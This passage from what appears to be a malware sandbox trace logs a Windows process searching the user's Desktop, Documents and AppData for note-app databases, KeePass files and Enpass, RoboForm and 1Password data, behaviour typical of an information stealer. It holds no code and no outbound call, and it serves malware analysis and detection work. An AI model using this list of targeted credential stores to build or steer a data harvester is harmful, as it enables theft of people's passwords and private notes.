param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0316.276] GetProcessHeap () returned 0x780000 [0316.276] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x79a760 [0316.276] GetProcessHeap () returned 0x780000 [0316.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.277] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.spn"), lpFindFileData=0x19f8f8 | out: lpFindFileData=0x19f8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x787868, ftLastWriteTime.dwHighDateTime=0x787868, nFileSizeHigh=0x793fd8, nFileSizeLow=0x794790, dwReserved0=0x0, dwReserved1=0x19f954, cFileName="ը瞆", cAlternateFileName="⦰螚䇆葒㓛ﭜ\x19䂑@")) returned 0xffffffff [0316.278] GetProcessHeap () returned 0x780000 [0316.278] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.278] GetProcessHeap () returned 0x780000 [0316.278] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.278] GetProcessHeap () returned 0x780000 [0316.279] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.279] GetProcessHeap () returned 0x780000 [0316.279] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0316.279] GetProcessHeap () returned 0x780000 [0316.279] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f74) returned 0x79ca28 [0316.280] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.280] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0316.280] GetProcessHeap () returned 0x780000 [0316.280] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x79a2e8 [0316.280] GetProcessHeap () returned 0x780000 [0316.281] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.282] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0316.282] GetProcessHeap () returned 0x780000 [0316.282] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.283] GetProcessHeap () returned 0x780000 [0316.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x12c) returned 0x79a2e8 [0316.283] GetProcessHeap () returned 0x780000 [0316.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0316.283] GetProcessHeap () returned 0x780000 [0316.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.283] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.284] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0316.284] GetProcessHeap () returned 0x780000 [0316.284] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79ca28 [0316.307] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.308] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\stickies\\images", arglist=0x19fb24 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0316.308] GetProcessHeap () returned 0x780000 [0316.308] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x79a760 [0316.308] GetProcessHeap () returned 0x780000 [0316.308] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.309] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0316.310] GetProcessHeap () returned 0x780000 [0316.310] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.310] GetProcessHeap () returned 0x780000 [0316.310] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.310] GetProcessHeap () returned 0x780000 [0316.310] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.311] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.312] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0316.312] GetProcessHeap () returned 0x780000 [0316.312] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x79ca28 [0316.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.313] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\stickies\\rtf", arglist=0x19fb0c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0316.313] GetProcessHeap () returned 0x780000 [0316.313] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x68) returned 0x79a760 [0316.313] GetProcessHeap () returned 0x780000 [0316.314] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.315] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0316.315] GetProcessHeap () returned 0x780000 [0316.315] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.315] GetProcessHeap () returned 0x780000 [0316.317] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.318] GetProcessHeap () returned 0x780000 [0316.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.318] GetProcessHeap () returned 0x780000 [0316.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0316.318] GetProcessHeap () returned 0x780000 [0316.318] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x12c) returned 0x79a2e8 [0316.319] GetProcessHeap () returned 0x780000 [0316.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b640 [0316.319] GetProcessHeap () returned 0x780000 [0316.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.319] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.320] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0316.320] GetProcessHeap () returned 0x780000 [0316.320] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f60) returned 0x79ca28 [0316.322] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.327] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\NoteFly\\notes", arglist=0x19fb54 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0316.327] GetProcessHeap () returned 0x780000 [0316.328] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6a) returned 0x79a760 [0316.328] GetProcessHeap () returned 0x780000 [0316.328] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.343] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0316.348] GetProcessHeap () returned 0x780000 [0316.348] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.349] GetProcessHeap () returned 0x780000 [0316.349] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.349] GetProcessHeap () returned 0x780000 [0316.349] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.349] GetProcessHeap () returned 0x780000 [0316.349] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0316.349] GetProcessHeap () returned 0x780000 [0316.349] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f86) returned 0x79ca28 [0316.355] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.356] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0316.356] GetProcessHeap () returned 0x780000 [0316.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79a2e8 [0316.356] GetProcessHeap () returned 0x780000 [0316.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.358] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0316.358] GetProcessHeap () returned 0x780000 [0316.358] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.358] GetProcessHeap () returned 0x780000 [0316.358] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f92) returned 0x79ca28 [0316.359] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.360] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0316.360] GetProcessHeap () returned 0x780000 [0316.360] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78ae50 [0316.360] GetProcessHeap () returned 0x780000 [0316.361] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.361] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0316.364] GetProcessHeap () returned 0x780000 [0316.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78ae50 | out: hHeap=0x780000) returned 1 [0316.364] GetProcessHeap () returned 0x780000 [0316.364] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.365] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.366] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.366] GetProcessHeap () returned 0x780000 [0316.366] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x79ca28 [0316.367] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.368] wvsprintfW (in: param_1=0x79ca28, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0316.368] GetProcessHeap () returned 0x780000 [0316.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x42) returned 0x79ac78 [0316.368] GetProcessHeap () returned 0x780000 [0316.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.369] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0316.370] GetProcessHeap () returned 0x780000 [0316.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.371] Sleep (dwMilliseconds=0xa) [0316.397] GetProcessHeap () returned 0x780000 [0316.397] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.398] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.399] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0316.399] GetProcessHeap () returned 0x780000 [0316.399] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x50) returned 0x79a2e8 [0316.399] GetProcessHeap () returned 0x780000 [0316.399] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.400] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdbx"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="걸yꕐy")) returned 0xffffffff [0316.400] GetProcessHeap () returned 0x780000 [0316.401] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.401] GetProcessHeap () returned 0x780000 [0316.401] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ac78 | out: hHeap=0x780000) returned 1 [0316.401] GetProcessHeap () returned 0x780000 [0316.401] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.402] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.402] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0316.403] GetProcessHeap () returned 0x780000 [0316.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x79ca28 [0316.403] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.404] wvsprintfW (in: param_1=0x79ca28, param_2="%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0316.404] GetProcessHeap () returned 0x780000 [0316.404] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e) returned 0x794510 [0316.404] GetProcessHeap () returned 0x780000 [0316.405] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.406] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0316.406] GetProcessHeap () returned 0x780000 [0316.407] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.408] Sleep (dwMilliseconds=0xa) [0316.437] GetProcessHeap () returned 0x780000 [0316.437] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.438] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.439] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f8c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0316.439] GetProcessHeap () returned 0x780000 [0316.439] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4c) returned 0x79a2e8 [0316.439] GetProcessHeap () returned 0x780000 [0316.439] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.440] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdbx"), lpFindFileData=0x19f8dc | out: lpFindFileData=0x19f8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䔐yꕐy")) returned 0xffffffff [0316.440] GetProcessHeap () returned 0x780000 [0316.440] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.440] GetProcessHeap () returned 0x780000 [0316.441] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794510 | out: hHeap=0x780000) returned 1 [0316.442] GetProcessHeap () returned 0x780000 [0316.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.442] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.443] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.443] GetProcessHeap () returned 0x780000 [0316.443] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x79ca28 [0316.444] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.445] wvsprintfW (in: param_1=0x79ca28, param_2="%s", arglist=0x19fb30 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0316.445] GetProcessHeap () returned 0x780000 [0316.445] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x42) returned 0x79ab88 [0316.445] GetProcessHeap () returned 0x780000 [0316.445] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.446] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0316.447] GetProcessHeap () returned 0x780000 [0316.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.448] Sleep (dwMilliseconds=0xa) [0316.559] GetProcessHeap () returned 0x780000 [0316.559] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.560] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.561] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f8b0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0316.561] GetProcessHeap () returned 0x780000 [0316.561] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4e) returned 0x79a2e8 [0316.561] GetProcessHeap () returned 0x780000 [0316.561] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.562] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdb"), lpFindFileData=0x19f8c4 | out: lpFindFileData=0x19f8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="ꮈyꕐy")) returned 0xffffffff [0316.562] GetProcessHeap () returned 0x780000 [0316.562] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.563] GetProcessHeap () returned 0x780000 [0316.563] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ab88 | out: hHeap=0x780000) returned 1 [0316.563] GetProcessHeap () returned 0x780000 [0316.563] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.564] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.564] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0316.564] GetProcessHeap () returned 0x780000 [0316.564] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x79ca28 [0316.565] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.566] wvsprintfW (in: param_1=0x79ca28, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0316.566] GetProcessHeap () returned 0x780000 [0316.566] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e) returned 0x794168 [0316.566] GetProcessHeap () returned 0x780000 [0316.567] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.568] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0316.568] GetProcessHeap () returned 0x780000 [0316.568] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.569] Sleep (dwMilliseconds=0xa) [0316.592] GetProcessHeap () returned 0x780000 [0316.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79ca28 [0316.592] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.593] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0316.593] GetProcessHeap () returned 0x780000 [0316.593] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4a) returned 0x79a2e8 [0316.593] GetProcessHeap () returned 0x780000 [0316.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.594] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdb"), lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䅨yꕐy")) returned 0xffffffff [0316.595] GetProcessHeap () returned 0x780000 [0316.595] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0316.595] GetProcessHeap () returned 0x780000 [0316.595] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794168 | out: hHeap=0x780000) returned 1 [0316.595] GetProcessHeap () returned 0x780000 [0316.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.596] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.597] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.599] GetProcessHeap () returned 0x780000 [0316.599] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f52) returned 0x79ca28 [0316.600] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.600] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\Enpass", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0316.600] GetProcessHeap () returned 0x780000 [0316.600] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x50) returned 0x79a760 [0316.601] GetProcessHeap () returned 0x780000 [0316.601] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.602] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0316.602] GetProcessHeap () returned 0x780000 [0316.603] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.603] GetProcessHeap () returned 0x780000 [0316.603] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.603] GetProcessHeap () returned 0x780000 [0316.603] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.604] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.604] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.604] GetProcessHeap () returned 0x780000 [0316.604] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f66) returned 0x79ca28 [0316.605] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.605] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\My RoboForm Data", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0316.605] GetProcessHeap () returned 0x780000 [0316.605] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x64) returned 0x79a760 [0316.605] GetProcessHeap () returned 0x780000 [0316.606] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ca28 | out: hHeap=0x780000) returned 1 [0316.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0316.606] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0316.607] GetProcessHeap () returned 0x780000 [0316.607] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a760 | out: hHeap=0x780000) returned 1 [0316.607] GetProcessHeap () returned 0x780000 [0316.607] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0316.607] GetProcessHeap () returned 0x780000 [0316.607] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a550 [0316.608] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0316.608] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x79a550 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0316.608] GetProcessHeap () returned 0x780000 [0316.608] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f58) returned 0x79ca28 [0316.609] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0316.610] wvsprintfW (in: param_1=0x79ca28, param_2="%s\\1Password", arglist=0x19fb74 | 